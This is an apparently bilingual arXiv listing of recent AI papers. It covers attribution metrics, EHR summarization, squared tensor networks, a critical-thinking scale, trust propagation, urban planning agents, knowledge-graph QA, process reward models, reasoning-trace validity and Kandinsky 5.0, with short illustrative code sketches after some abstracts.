大型语言模型(LLM)越来越多地使用输入归因方法进行评估,但比较这些解释仍然具有挑战性。现有的软扰动忠实性指标,如Soft-NC和Soft-NS,可能将归因质量与扰动期间保留的词数混为一谈:平均得分较高的归因方法可能保留更多词,从而获得膨胀的分数。为解决此问题,我们提出π-Soft-NC和π-Soft-NS,这是一个在相同期望保留概率下比较归因方法的评估框架,从而控制保留词数。我们进一步引入Grad-ELLM,一种针对自回归仅解码器LLM定制的基于梯度的归因方法,该方法在每个解码步骤将梯度导出的通道重要性与注意力导出的标记重要性相结合。在Llama和Mistral上的分类和开放生成任务实验表明,Grad-ELLM在π-Soft-NC下实现了强全面性导向的忠实性,而在π-Soft-NS下没有主导方法。我们的评估指标为比较LLM的可解释人工智能方法提供了一个严格的框架,将支持该领域的进展。

英文摘要

Large Language Models (LLMs) are increasingly evaluated with input attribution methods, yet comparing such explanations remains challenging. Existing soft-perturbation faithfulness metrics, such as Soft-NC and Soft-NS, can conflate attribution quality with the number of words retained during perturbation: attribution methods with larger average scores may keep more words and therefore obtain inflated scores. To address this issue, we propose $π$-Soft-NC and $π$-Soft-NS, an evaluation framework that compares attribution methods under the same expected retaining probability, thus controlling the number of retained words. We further introduce Grad-ELLM, a gradient-based attribution method tailored to autoregressive decoder-only LLMs, which combines gradient-derived channel importance with attention-derived token importance at each decoding step. Experiments on classification and open-generation tasks with Llama and Mistral show that Grad-ELLM achieves strong comprehensiveness-oriented faithfulness under $π$-Soft-NC, while there is no dominant method under $π$-Soft-NS. Our evaluation metric serves as a rigorous framework to compare XAI methods for LLMs, which will support progress in the field.
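
The idea of comparing attribution methods under the same expected retaining probability can be sketched as follows. This is an illustrative calibration, not the paper's definition of $π$-Soft-NC or $π$-Soft-NS. The function name and the sigmoid-with-shift mapping are assumptions: each method's raw scores are shifted so that the mean per-token retain probability equals a shared budget `pi`.

```python
import numpy as np


def retain_probs_at_budget(scores, pi: float, iters: int = 80) -> np.ndarray:
    """Map raw attribution scores to per-token retain probabilities whose
    mean equals `pi`, by bisecting on an additive shift inside a sigmoid.
    (Hypothetical scheme, used only to illustrate budget matching.)"""
    s = np.asarray(scores, dtype=float)
    lo, hi = -50.0 - s.max(), 50.0 - s.min()  # mean prob is ~0 at lo, ~1 at hi
    for _ in range(iters):
        mid = 0.5 * (lo + hi)
        mean_p = (1.0 / (1.0 + np.exp(-(s + mid)))).mean()
        if mean_p < pi:
            lo = mid
        else:
            hi = mid
    return 1.0 / (1.0 + np.exp(-(s + hi)))


# Two attribution methods whose raw scores live on very different scales.
p_small = retain_probs_at_budget([0.1, 0.2, 0.3], pi=0.5)
p_large = retain_probs_at_budget([5.0, 6.0, 9.0], pi=0.5)
print(p_small.mean(), p_large.mean())
```

After calibration both methods keep the same expected fraction of tokens, so a method can no longer score higher merely because its raw scores are larger. The ranking of tokens within each method is unchanged because the mapping is monotone.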

2601.01668 2026-05-27 cs.CL cs.AI 版本更新

EHRSummarizer: A Privacy-Aware, FHIR-Native Reference Architecture for Source-Grounded EHR Summarization

EHRSummarizer:一种隐私感知、FHIR原生、基于来源的EHR摘要参考架构

Houman Kazemzadeh, Nima Minaifar, Kamyar Naderi, Sho Tabibzadeh

发表机构 * MedLedger365 MedConnect365 Xylemed Kypath Associates Inc.

AI总结 提出一种隐私感知、FHIR原生的参考架构EHRSummarizer,通过检索HL7 FHIR R4资源并以受约束的方式生成基于来源的摘要,以支持临床病历审查。

Comments 15 pages, 2 figures, 2 tables. Version 2 clarifies missing-data status handling, medication-status ambiguity, controlled narrative-document handling, source-grounded resource grouping, and future source-to-summary traceability

详情
AI中文摘要

临床医生通常需要浏览碎片化的电子健康记录(EHR)界面,以整合患者问题、用药、近期就诊和纵向趋势的连贯图像。本文描述了EHRSummarizer,一种用于结构化EHR摘要的隐私感知、FHIR原生参考架构。该架构检索一组有针对性的高价值HL7 FHIR R4资源,将其标准化为临床上下文包,并使用受约束的摘要阶段生成基于来源的摘要,旨在支持病历审查。该架构进一步阐明了缺失数据状态处理、用药状态模糊性、在可用时对叙述性临床文档的受控使用,以及未来的源到摘要可追溯性。本文描述的是参考架构和原型行为,而非经过验证的临床干预、自主临床决策支持系统或临床获益证据。在合成和测试FHIR环境上的原型演示展示了端到端行为和输出格式;然而,本文未报告临床结果、受控工作流研究或基准结果。我们概述了一个评估计划,重点关注忠实性、遗漏风险、时间正确性、可用性、隐私和操作监控,以指导未来的机构评估。

英文摘要

Clinicians routinely navigate fragmented electronic health record (EHR) interfaces to assemble a coherent picture of a patient's problems, medications, recent encounters, and longitudinal trends. This manuscript describes EHRSummarizer, a privacy-aware, FHIR-native reference architecture for structured EHR summarization. The architecture retrieves a targeted set of high-yield HL7 FHIR R4 resources, normalizes them into a clinical context package, and uses a constrained summarization stage to produce source-grounded summaries intended to support chart review. The architecture further clarifies missing-data status handling, medication-status ambiguity, controlled use of narrative clinical documents when available, and future source-to-summary traceability. The manuscript describes a reference architecture and prototype behavior rather than a validated clinical intervention, autonomous clinical decision-support system, or evidence of clinical benefit. Prototype demonstrations on synthetic and test FHIR environments illustrate end-to-end behavior and output formats; however, this manuscript does not report clinical outcomes, controlled workflow studies, or benchmark results. We outline an evaluation plan centered on faithfulness, omission risk, temporal correctness, usability, privacy, and operational monitoring to guide future institutional assessment.
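
The retrieval step can be pictured as a handful of FHIR REST searches scoped to one patient. The sketch below is an assumption-laden illustration. The abstract does not list the resource types used, so the set here is a guess based on the problems, medications, encounters, and trends it mentions. The base URL and patient id are placeholders, and `build_search_urls` is a hypothetical helper. Only the standard `patient` and `_count` search parameters are used.

```python
from typing import Dict
from urllib.parse import urlencode

# Assumed mapping: problems -> Condition, medications -> MedicationRequest,
# recent encounters -> Encounter, longitudinal trends -> Observation.
RESOURCE_TYPES = ("Condition", "MedicationRequest", "Encounter", "Observation")


def build_search_urls(base_url: str, patient_id: str, count: int = 50) -> Dict[str, str]:
    """Return one FHIR search URL per resource type for a single patient."""
    query = urlencode({"patient": patient_id, "_count": count})
    root = base_url.rstrip("/")
    return {rt: f"{root}/{rt}?{query}" for rt in RESOURCE_TYPES}


# Placeholder server and patient id, not taken from the paper.
urls = build_search_urls("https://fhir.example.org/r4", "example-patient-1")
for resource_type, url in urls.items():
    print(resource_type, url)
```

Each URL would return a FHIR Bundle. Normalizing those bundles into a clinical context package, and handling missing-data status, is the part the manuscript describes and is not attempted here.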

2512.17090 2026-05-27 cs.LG cs.AI 版本更新

How to Square Tensor Networks and Circuits Without Squaring Them

如何平方张量网络和电路而不进行平方操作

Lorenzo Loconte, Adrián Javaloy, Antonio Vergari

发表机构 * School of Informatics, University of Edinburgh, UK(爱丁堡大学信息学院)

AI总结 提出一种参数化方法,通过正交性和确定性条件简化平方张量网络和电路的边际化计算,避免额外复杂度,并在分布估计任务中保持表达能力且提升学习效率。

详情
AI中文摘要

平方张量网络(TNs)及其作为计算图的扩展——平方电路——已被用作表达性的分布估计器,同时支持闭式边际化。然而,平方操作在计算配分函数或边际化变量时引入了额外的复杂性,这阻碍了它们在机器学习中的应用。为了解决这个问题,张量网络的正则形式通过酉矩阵参数化以简化边际计算。然而,这些正则形式不适用于电路,因为电路可以表示不直接映射到已知张量网络的分解。受正则形式中的正交性和电路中实现可处理最大化的确定性的启发,我们展示了如何参数化平方电路以克服其边际化开销。我们的参数化即使在不同于张量网络的分解中也能实现高效的边际化,这些分解编码为电路,否则其结构会使边际化计算变得困难。最后,我们在分布估计上的实验表明,我们提出的平方电路条件在没有任何表达能力损失的情况下,实现了更高效的学习。

英文摘要

Squared tensor networks (TNs) and their extension as computational graphs--squared circuits--have been used as expressive distribution estimators, yet supporting closed-form marginalization. However, the squaring operation introduces additional complexity when computing the partition function or marginalizing variables, which hinders their applicability in ML. To solve this issue, canonical forms of TNs are parameterized via unitary matrices to simplify the computation of marginals. However, these canonical forms do not apply to circuits, as they can represent factorizations that do not directly map to a known TN. Inspired by the ideas of orthogonality in canonical forms and determinism in circuits enabling tractable maximization, we show how to parameterize squared circuits to overcome their marginalization overhead. Our parameterizations unlock efficient marginalization even in factorizations different from TNs, but encoded as circuits, whose structure would otherwise make marginalization computationally hard. Finally, our experiments on distribution estimation show how our proposed conditions in squared circuits come with no expressiveness loss, while enabling more efficient learning.
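
Why orthogonality removes the cost of squaring can be seen in a two-factor toy model. The sketch below mirrors the canonical-form idea for tensor networks mentioned in the abstract and is not the paper's circuit parameterization. The shapes and variable names are assumptions. The unnormalized model is p(x1, x2) ∝ c(x1, x2)^2 with c = Q B.

```python
import numpy as np

rng = np.random.default_rng(0)
A = rng.normal(size=(4, 3))  # factor over x1 (4 states), inner rank 3
B = rng.normal(size=(3, 5))  # factor over x2 (5 states)

# Orthonormalise the columns of the first factor, so that Q.T @ Q = I.
Q, _ = np.linalg.qr(A)

# Brute force: materialise c(x1, x2), square it, sum over every state.
c = Q @ B
Z_brute = float((c ** 2).sum())
marginal_brute = (c ** 2).sum(axis=0)  # sum over x1 for each x2

# Shortcut: sum_x1 c^2 = diag(B.T Q.T Q B) = diag(B.T B), so Q drops out.
Z_short = float((B ** 2).sum())
marginal_short = (B ** 2).sum(axis=0)

print(Z_brute, Z_short)
```

Because the orthonormal factor cancels, the partition function and the marginal over x2 are read off from B alone, without expanding the squared product.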

2512.12413 2026-05-27 cs.AI cs.HC 版本更新

Understanding Critical Thinking in Generative Artificial Intelligence Use: Development, Validation, and Correlates of the Critical Thinking in AI Use Scale

理解生成式人工智能使用中的批判性思维:AI使用批判性思维量表的开发、验证与相关因素

Gabriel R. Lau, Wei Yan Low, Louis Tay, Ysabel Guevarra, Dragan Gašević, Andree Hartanto

发表机构 * School of Social Sciences, Nanyang Technological University(南洋理工大学社会科学学院) Interdisciplinary Graduate Programme, Nanyang Technological University(南洋理工大学跨学科研究生项目) College of Health and Human Sciences, Purdue University(普渡大学健康与人类科学学院) School of Social Sciences, Singapore Management University(新加坡管理大学社会科学学院) Faculty of Information Technology, Monash University(蒙纳士大学信息技术学院)

AI总结 本研究开发并验证了13项批判性思维在AI使用中的量表,发现其包含验证、动机和反思三个因子,并与开放性、外向性、积极情感和AI使用频率正相关,且能预测更频繁的验证策略和更高的真实性判断准确性。

详情
Journal ref
Computers in Human Behavior Reports, 22, 101103 (2026)
AI中文摘要

生成式AI工具日益嵌入日常工作和学习中,但其流畅性、不透明性和产生幻觉的倾向意味着用户必须批判性地评估AI输出,而不是全盘接受。本研究将AI使用中的批判性思维概念化为一种倾向性特质,包括验证AI生成信息的来源和内容、理解模型的工作原理及其失败之处,以及反思依赖AI的更广泛影响。通过六项研究(N=1365),我们开发并验证了13项批判性思维在AI使用中的量表,并绘制了其法则网络。研究1生成并内容验证了量表项目。研究2支持了三因子结构(验证、动机和反思)。研究3、4和5确认了这一高阶模型,展示了内部一致性、重测信度、强因子载荷、性别不变性以及收敛和判别效度。研究3和4进一步揭示,AI使用中的批判性思维与开放性、外向性、积极特质情感和AI使用频率正相关。最后,研究6展示了量表的效标效度,更高的批判性思维在AI使用中的得分预测了更频繁和多样化的验证策略、在新型自然主义ChatGPT驱动的事实核查任务中更高的真实性判断准确性,以及对负责任AI的更深入反思。总之,当前工作阐明了人们为何以及如何对生成式AI输出进行监督,并提供了一个经过验证的量表和生态学基础的任务范式,以支持关于批判性参与生成式AI输出的理论检验、跨群体和纵向研究。

英文摘要

Generative AI tools are increasingly embedded in everyday work and learning, yet their fluency, opacity, and propensity to hallucinate mean that users must critically evaluate AI outputs rather than accept them at face value. The present research conceptualises critical thinking in AI use as a dispositional tendency to verify the source and content of AI-generated information, to understand how models work and where they fail, and to reflect on the broader implications of relying on AI. Across six studies (N = 1365), we developed and validated the 13-item critical thinking in AI use scale and mapped its nomological network. Study 1 generated and content-validated scale items. Study 2 supported a three-factor structure (Verification, Motivation, and Reflection). Studies 3, 4, and 5 confirmed this higher-order model, demonstrated internal consistency and test-retest reliability, strong factor loadings, sex invariance, and convergent and discriminant validity. Studies 3 and 4 further revealed that critical thinking in AI use was positively associated with openness, extraversion, positive trait affect, and frequency of AI use. Lastly, Study 6 demonstrated criterion validity of the scale, with higher critical thinking in AI use scores predicting more frequent and diverse verification strategies, greater veracity-judgement accuracy in a novel and naturalistic ChatGPT-powered fact-checking task, and deeper reflection about responsible AI. Taken together, the current work clarifies why and how people exercise oversight over generative AI outputs and provides a validated scale and ecologically grounded task paradigm to support theory testing, cross-group, and longitudinal research on critical engagement with generative AI outputs.

2511.20586 2026-05-27 cs.AI cs.LG 版本更新

PaTAS: A Framework for Trust Propagation in Neural Networks Using Subjective Logic

PaTAS:基于主观逻辑的神经网络信任传播框架

Koffi Ismael Ouattara, Ioannis Krontiris, Theo Dimitrakos, Dennis Eisermann, Houda Labiod, Frank Kargl

AI总结 提出PaTAS框架,利用主观逻辑在神经网络中并行传播信任,通过信任节点和信任函数量化输入、参数和激活的信任,并设计参数信任更新和推理路径信任评估方法,以在对抗或退化条件下提供可解释的信任估计。

详情
AI中文摘要

可信度已成为安全关键应用中人工智能系统部署的关键要求。传统的评估指标(如准确率和精确率)无法充分捕捉不确定性或模型预测的可靠性,尤其是在对抗或退化条件下。本文介绍了并行信任评估系统(PaTAS),这是一个使用主观逻辑(SL)对神经网络中的信任进行建模和传播的框架。PaTAS通过信任节点和信任函数与标准神经计算并行运行,这些节点和函数在网络中传播输入、参数和激活信任。该框架定义了一种参数信任更新机制,以在训练过程中优化参数可靠性,以及一种推理路径信任评估(IPTA)方法,以在推理时计算实例特定的信任。在真实世界和对抗性数据集上的实验表明,PaTAS产生可解释、对称且收敛的信任估计,这些估计补充了准确率,并揭示了在中毒、有偏或不确定数据场景中的可靠性差距。结果表明,PaTAS有效区分良性输入和对抗性输入,并识别模型置信度与实际可靠性不一致的情况。通过在神经架构中实现透明且可量化的信任推理,PaTAS为评估AI生命周期中的模型可靠性提供了基础。

英文摘要

Trustworthiness has become a key requirement for the deployment of artificial intelligence systems in safety-critical applications. Conventional evaluation metrics, such as accuracy and precision, fail to appropriately capture uncertainty or the reliability of model predictions, particularly under adversarial or degraded conditions. This paper introduces the Parallel Trust Assessment System (PaTAS), a framework for modeling and propagating trust in neural networks using Subjective Logic (SL). PaTAS operates in parallel with standard neural computation through Trust Nodes and Trust Functions that propagate input, parameter, and activation trust across the network. The framework defines a Parameter Trust Update mechanism to refine parameter reliability during training and an Inference-Path Trust Assessment (IPTA) method to compute instance-specific trust at inference. Experiments on real-world and adversarial datasets demonstrate that PaTAS produces interpretable, symmetric, and convergent trust estimates that complement accuracy and expose reliability gaps in poisoned, biased, or uncertain data scenarios. The results show that PaTAS effectively distinguishes between benign and adversarial inputs and identifies cases where model confidence diverges from actual reliability. By enabling transparent and quantifiable trust reasoning within neural architectures, PaTAS provides a foundation for evaluating model reliability across the AI lifecycle.
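
For readers unfamiliar with Subjective Logic, the sketch below shows the basic object such a framework propagates: a binomial opinion with belief, disbelief, and uncertainty mass plus a base rate. It covers only the standard opinion representation and evidence mapping. PaTAS's Trust Nodes, Trust Functions, and update rules are not reproduced, and the class and function names are illustrative assumptions.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Opinion:
    """Binomial Subjective Logic opinion; the three masses sum to 1."""
    belief: float
    disbelief: float
    uncertainty: float
    base_rate: float = 0.5

    def __post_init__(self) -> None:
        total = self.belief + self.disbelief + self.uncertainty
        if abs(total - 1.0) > 1e-9:
            raise ValueError("belief + disbelief + uncertainty must equal 1")

    def projected_probability(self) -> float:
        """Belief plus the base-rate share of the uncertainty mass."""
        return self.belief + self.base_rate * self.uncertainty


def from_evidence(positive: float, negative: float, prior_weight: float = 2.0) -> Opinion:
    """Map counts of supporting and contradicting evidence to an opinion.
    More evidence shrinks the uncertainty mass."""
    total = positive + negative + prior_weight
    return Opinion(positive / total, negative / total, prior_weight / total)


no_evidence = from_evidence(0, 0)    # fully uncertain
well_supported = from_evidence(8, 0)
print(no_evidence.projected_probability(), well_supported.projected_probability())
```

Unlike a bare probability, the opinion keeps "no evidence" (all mass on uncertainty) distinct from "balanced evidence". A trust estimate needs that distinction to flag inputs or parameters it knows little about.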

2412.20505 2026-05-27 cs.AI cs.CL cs.LG 版本更新

LiPUP-MA: A Residential Experience-centric Multi-Agent Framework for Living-in-the-loop Participatory Urban Planning

LiPUP-MA:一种面向循环参与式城市规划的、以居住体验为中心的多智能体框架

Hang Ni, Yuzhi Wang, Yizhi Song, Hao Liu

发表机构 * The Hong Kong University of Science and Technology (Guangzhou)(香港科技大学(广州)) The Hong Kong Polytechnic University(香港理工大学)

AI总结 提出LiPUP-MA多智能体框架,通过模拟居住生活与体验驱动的计划修订循环,利用基于图的经验库和空间约束技能增强规划器,解决参与式城市规划中经验落地与反馈空间化问题。

详情
AI中文摘要

参与式城市规划(PUP)日益得到基于LLM的智能体的支持,但现有方法主要依赖于静态偏好获取和一次性利益相关者讨论,忽视了现实世界规划的周期性——居住生活、经验收集和计划调整持续互动。我们提出循环参与式城市规划(LiPUP),一种在模拟居住生活和经验驱动的计划修订之间交替的闭环范式,同时面临两个关键挑战:将分散的居住经验锚定到具体的城市背景中,以及将主观反馈转化为空间连贯的规划行动。为实例化LiPUP,我们引入LiPUP-MA,一个基于LLM的多智能体框架,它构建了一个以计划为中心的基于图的经验库,用于组织来自生活模拟的基于城市的居住反馈,并配备了一个空间约束的技能增强规划器智能体,通过协调经验、视觉和地理空间证据来修订计划。实验表明,LiPUP-MA在传统的静态规划指标和基于生活的指标上均持续优于基线,而迭代的LiPUP循环进一步提高了计划质量。

英文摘要

Participatory Urban Planning (PUP) is increasingly supported by LLM-based agents, yet existing methods largely rely on static preference elicitation and one-shot stakeholder discussions, overlooking the cyclical nature of real-world planning, where residential life, experience collection, and plan adjustment continually interact. We propose Living-in-the-loop Participatory Urban Planning (LiPUP), a closed-loop paradigm that alternates between simulated residential living and experience-driven plan revision, while posing two key challenges: grounding scattered living experience in concrete urban contexts and translating subjective feedback into spatially coherent planning actions. To instantiate LiPUP, we introduce LiPUP-MA, an LLM-based multi-agent framework that constructs a Plan-centric Graph-based Experience Bank to organize urban-grounded residential feedback from living simulation and equips a Spatially-constrained Skill-augmented Planner agent to revise plans by harmonizing experiential, visual, and geospatial evidence. Experiments show that LiPUP-MA consistently outperforms baselines on both conventional static planning metrics and living-based metrics, while iterative LiPUP cycles further improve plan quality.

2512.04868 2026-05-27 cs.CL cs.AI 版本更新

SEAL: Self-Evolving Agentic Learning for Conversational Question Answering over Knowledge Graphs

SEAL: 面向知识图谱对话问答的自我演进智能体学习

Hao Wang, Jialun Zhong, Changcheng Wang, Zhujun Nie, Zheng Li, Shunyu Yao, Yanzeng Li, Xinchi Li

发表机构 * Institute of Big Data and Artificial Intelligence, China Telecom Research Institute(大数据与人工智能研究院,中国电信研究院) Wangxuan Institute of Computer Technology, Peking University(王选计算机研究所,北京大学) School of Artificial Intelligence, China University of Geosciences (Beijing)(人工智能学院,中国地质大学(北京)) Center for Cognition and Neuroergonomics, State Key Laboratory of Cognitive Neuroscience and Learning, Beijing Normal University(认知与神经工效学中心,认知神经科学与学习国家重点实验室,北京师范大学) Institute of Artificial Intelligence and Future Networks, Beijing Normal University(人工智能与未来网络研究院,北京师范大学)

AI总结 提出SEAL两阶段语义解析框架,通过自我演进智能体学习解决知识图谱对话问答中的指代消解、上下文依赖和复杂逻辑推理问题,在SPICE基准上达到最先进性能。

Comments Accepted by Neurocomputing

详情
AI中文摘要

基于知识的对话问答(KBCQA)在解决指代消解、上下文依赖建模和执行复杂逻辑推理方面面临持续挑战。现有方法通常存在不准确性和高昂的计算成本,尤其是在处理大规模知识图谱上的复杂查询时。具体而言,大型语言模型(LLM)倾向于为复杂的多跳或聚合查询生成语法无效或语义错位的逻辑形式,而传统的实体-关系链接方法则面临候选空间指数级增长的问题。为了解决这些限制,我们引入了SEAL,一种基于自我演进智能体学习的新型两阶段语义解析框架。在第一阶段,LLM提取一个捕获核心语义的最小S表达式核心,然后通过智能体校准模块进行修正,以纠正语法不一致性并将实体和关系与知识图谱对齐。第二阶段采用基于问题类型预测的模板补全来构建完全可执行的S表达式。关键的是,SEAL包含一种自我演进机制,将局部和全局记忆与反射模块相结合,能够从对话历史和执行反馈中持续适应,而无需显式重新训练。在SPICE基准上的大量实验表明,SEAL在多跳推理、比较和聚合任务中实现了最先进的性能,验证了在结构准确性和计算效率方面的显著提升。

英文摘要

Knowledge-based conversational question answering (KBCQA) confronts persistent challenges in resolving coreference, modeling contextual dependencies, and executing complex logical reasoning. Existing approaches often suffer from inaccuracies and prohibitive computational costs, particularly when processing intricate queries over large knowledge graphs. Specifically, large language models (LLMs) tend to generate syntactically invalid or semantically misaligned logical forms for complex multi-hop or aggregation queries, while conventional entity-relation linking methods face an exponentially growing candidate space. To address these limitations, we introduce SEAL, a novel two-stage semantic parsing framework grounded in self-evolving agentic learning. In the first stage, an LLM extracts a minimal S-expression core capturing the essential semantics, which is then refined by an agentic calibration module to correct syntactic inconsistencies and align entities and relations with the knowledge graph. The second stage employs template-based completion guided by question-type prediction to construct a fully executable S-expression. Crucially, SEAL incorporates a self-evolving mechanism integrating local and global memory with a reflection module, enabling continuous adaptation from dialog history and execution feedback without explicit retraining. Extensive experiments on the SPICE benchmark demonstrate that SEAL achieves state-of-the-art performance in multi-hop reasoning, comparison, and aggregation tasks, validating notable gains in both structural accuracy and computational efficiency.

2506.09532 2026-05-27 cs.LG cs.AI cs.CL cs.CV 版本更新

Athena: Enhancing Multimodal Reasoning with Data-efficient Process Reward Models

Athena: 利用数据高效的过程奖励模型增强多模态推理

Shuai Wang, Zhenhua Liu, Jiaheng Wei, Xuanwu Yin, Dong Li, Emad Barsoum

发表机构 * Advanced Micro Devices Inc.(超威半导体公司) The Hong Kong University of Science and Technology (Guangzhou)(香港科技大学(广州))

AI总结 提出 Athena-PRM,一种多模态过程奖励模型,通过利用弱和强完成者之间的预测一致性高效生成高质量过程标签,在仅5000样本下显著提升复杂推理问题的逐步评估性能。

Comments TMLR 2026, https://openreview.net/forum?id=unWmplHccF

详情
AI中文摘要

我们提出了 Athena-PRM,一种多模态过程奖励模型(PRM),旨在评估解决复杂推理问题中每一步的奖励分数。开发高性能的PRM通常需要大量的时间和资金投入,主要因为需要推理步骤的逐步标注。传统的自动标注方法,如蒙特卡洛估计,通常会产生噪声标签并带来巨大的计算成本。为了高效生成高质量的过程标注数据,我们提出利用弱和强完成者之间的预测一致性作为识别可靠过程标签的标准。值得注意的是,Athena-PRM 在仅5000个样本的情况下,在各种场景和基准测试中展现出卓越的效果。此外,我们还开发了两种有效策略来提升PRM的性能:ORM初始化和负数据上采样。我们在三个具体场景中验证了我们的方法:测试时扩展的验证、推理步骤正确性的直接评估以及奖励排序微调。我们的 Athena-PRM 在多个基准测试和场景中持续取得优越性能。值得注意的是,当使用 Qwen2.5-VL-7B 作为策略模型时,Athena-PRM 在 WeMath 上提升了10.2个百分点,在 MathVista 上提升了7.1个百分点(测试时扩展)。此外,Athena-PRM 在 VisualProcessBench 上取得了最先进(SoTA)结果,比之前的 SoTA 高出3.9个F1分数,展示了其准确评估推理步骤正确性的强大能力。另外,利用 Athena-PRM 作为奖励模型,我们通过奖励排序微调开发了 Athena-7B,在五个基准测试上以显著优势超越了基线。

英文摘要

We present Athena-PRM, a multimodal process reward model (PRM) designed to evaluate the reward score for each step in solving complex reasoning problems. Developing high-performance PRMs typically demands significant time and financial investment, primarily due to the necessity for step-level annotations of reasoning steps. Conventional automated labeling methods, such as Monte Carlo estimation, often produce noisy labels and incur substantial computational costs. To efficiently generate high-quality process-labeled data, we propose leveraging prediction consistency between weak and strong completers as a criterion for identifying reliable process labels. Remarkably, Athena-PRM demonstrates outstanding effectiveness across various scenarios and benchmarks with just 5,000 samples. Furthermore, we develop two effective strategies to improve the performance of PRMs: ORM initialization and up-sampling for negative data. We validate our approach in three specific scenarios: verification for test-time scaling, direct evaluation of reasoning step correctness, and reward ranked fine-tuning. Our Athena-PRM consistently achieves superior performance across multiple benchmarks and scenarios. Notably, when using Qwen2.5-VL-7B as the policy model, Athena-PRM enhances performance by 10.2 points on WeMath and 7.1 points on MathVista for test-time scaling. Furthermore, Athena-PRM sets a new state-of-the-art (SoTA) result on VisualProcessBench, outperforming the previous SoTA by 3.9 F1 points and showcasing its robust capability to accurately assess the correctness of reasoning steps. Additionally, using Athena-PRM as the reward model, we develop Athena-7B with reward ranked fine-tuning, which outperforms the baseline by a significant margin on five benchmarks.
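
The consistency criterion can be sketched as a simple filter over step-level labels. The abstract does not specify how labels are derived from completions, so the sketch assumes a hard Monte Carlo rule (a step counts as correct if at least one rollout continued from it reaches the right answer). The function names and the example counts are likewise assumptions.

```python
from typing import List, Tuple


def mc_step_label(successes: int) -> int:
    """Hard Monte Carlo label (assumed rule): 1 if any rollout continued
    from this step reached the correct final answer, else 0."""
    return 1 if successes > 0 else 0


def keep_consistent_steps(
    weak_successes: List[int], strong_successes: List[int]
) -> List[Tuple[int, int]]:
    """Keep (step_index, label) only where the weak and the strong
    completer yield the same label; disagreements are treated as noisy."""
    kept = []
    for i, (w, s) in enumerate(zip(weak_successes, strong_successes)):
        weak_label, strong_label = mc_step_label(w), mc_step_label(s)
        if weak_label == strong_label:
            kept.append((i, weak_label))
    return kept


# Successful rollouts per reasoning step, for each completer (made-up counts).
weak = [3, 0, 0, 0]
strong = [8, 5, 0, 0]
kept = keep_consistent_steps(weak, strong)
print(kept)
```

Step 1 is dropped in this example. Only the strong completer recovers from it, so a label from either completer alone would be unreliable, while steps where both agree are kept as training signal.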

2505.13775 2026-05-27 cs.LG cs.AI 版本更新

Beyond Semantics: The Unreasonable Effectiveness of Reasonless Intermediate Tokens

超越语义:无理由中间标记的不合理有效性

Karthik Valmeekam, Vardhan Palod, Kaya Stechly, Atharva Gundawar, Subbarao Kambhampati

发表机构 * School of Computing and AI(计算与人工智能学院) Arizona State University(亚利桑那州立大学) Amazon AGI(亚马逊人工通用智能) Yale University(耶鲁大学)

AI总结 通过从零训练Transformer模型于形式可验证推理轨迹,发现模型在正确与损坏轨迹上表现相似,且损坏轨迹在分布外任务上泛化更好,挑战了中间标记反映或诱导可预测推理行为的假设。

Comments Published in Transactions on Machine Learning Research (TMLR)

详情
AI中文摘要

近期大型推理模型的显著成果被解读为思维链(CoT)的胜利,尤其是基于基础LLM采样的CoT训练过程有助于发现新的推理模式。虽然这些轨迹确实有助于模型性能,但其影响机制尚不明确:一些研究赋予其语义,另一些则警告不要将其视为模型内部计算过程的透明忠实代理。为系统探究推导轨迹的终端用户语义作用,我们设置了一项受控研究,从零开始训练Transformer模型于形式可验证的推理轨迹及其导向的解决方案。我们注意到,尽管相比仅解决方案的基线有所提升,但训练于完全正确轨迹的模型在得出正确解决方案时仍可能产生无效推理轨迹。更有趣的是,实验表明,训练于损坏轨迹(其中间推理步骤与所附问题无关)的模型与训练于正确轨迹的模型表现相似,甚至在分布外任务上泛化更好。我们还研究了基于GRPO的RL后训练对轨迹有效性的影响,发现虽然解决方案准确性提高,但轨迹有效性并未随之改善。最后,我们考察了推理轨迹长度是否反映推理时扩展,发现轨迹长度在很大程度上与所解决问题的底层计算复杂度无关。这些结果挑战了中间标记或“思维链”反映或诱导可预测推理行为的假设,并警示不要将此类输出拟人化或过度解读(尽管其表面形式看似合理)为语言模型中类人或类算法行为的证据。

英文摘要

Recent impressive results from large reasoning models have been interpreted as a triumph of Chain of Thought (CoT), and especially of the process of training on CoTs sampled from base LLMs in order to help find new reasoning patterns. While these traces certainly seem to help model performance, it is not clear how they influence it, with some works ascribing semantics to them and others cautioning against relying on them as transparent and faithful proxies of the model's internal computational process. To systematically investigate the role of end-user semantics of derivational traces, we set up a controlled study where we train transformer models from scratch on formally verifiable reasoning traces and the solutions they lead to. We notice that, despite gains over the solution-only baseline, models trained on entirely correct traces can still produce invalid reasoning traces even when arriving at correct solutions. More interestingly, our experiments also show that models trained on corrupted traces, whose intermediate reasoning steps bear no relation to the problem they accompany, perform similarly to those trained on correct ones, and even generalize better on out-of-distribution tasks. We also study the effect of GRPO-based RL post-training on trace validity, noting that while solution accuracy increases, this is not accompanied by improvements in trace validity. Finally, we examine whether reasoning-trace length reflects inference-time scaling and find that trace length is largely agnostic to the underlying computational complexity of the problem being solved. These results challenge the assumption that intermediate tokens or "Chains of Thought" reflect or induce predictable reasoning behaviors and caution against anthropomorphizing such outputs or over-interpreting them (despite their seemingly plausible forms) as evidence of human-like or algorithmic behaviors in language models.

2511.14993 2026-05-27 cs.CV cs.AI cs.LG 版本更新

Kandinsky 5.0: A Family of Foundation Models for Image and Video Generation

Kandinsky 5.0:图像与视频生成的基础模型系列

Vladimir Arkhipkin, Vladimir Korviakov, Nikolai Gerasimenko, Denis Parkhomenko, Viacheslav Vasilev, Alexey Letunovskiy, Nikolai Vaulin, Maria Kovaleva, Ivan Kirillov, Lev Novitskiy, Denis Koposov, Nikita Kiselev, Alexander Varlamov, Dmitrii Mikhailov, Vladimir Polovnikov, Andrey Shutkin, Julia Agafonova, Ilya Vasiliev, Anastasiia Kargapoltseva, Anna Dmitrienko, Anastasia Maltseva, Anna Averchenkova, Olga Kim, Tatiana Nikulina, Denis Dimitrov

发表机构 * Kandinsky Lab(Kandinsky 实验室)

AI总结 本文介绍Kandinsky 5.0系列模型,通过多阶段训练、自监督微调和强化学习后训练,实现高分辨率图像和10秒视频的高质量生成。

Comments Website: https://kandinskylab.ai/

详情
AI中文摘要

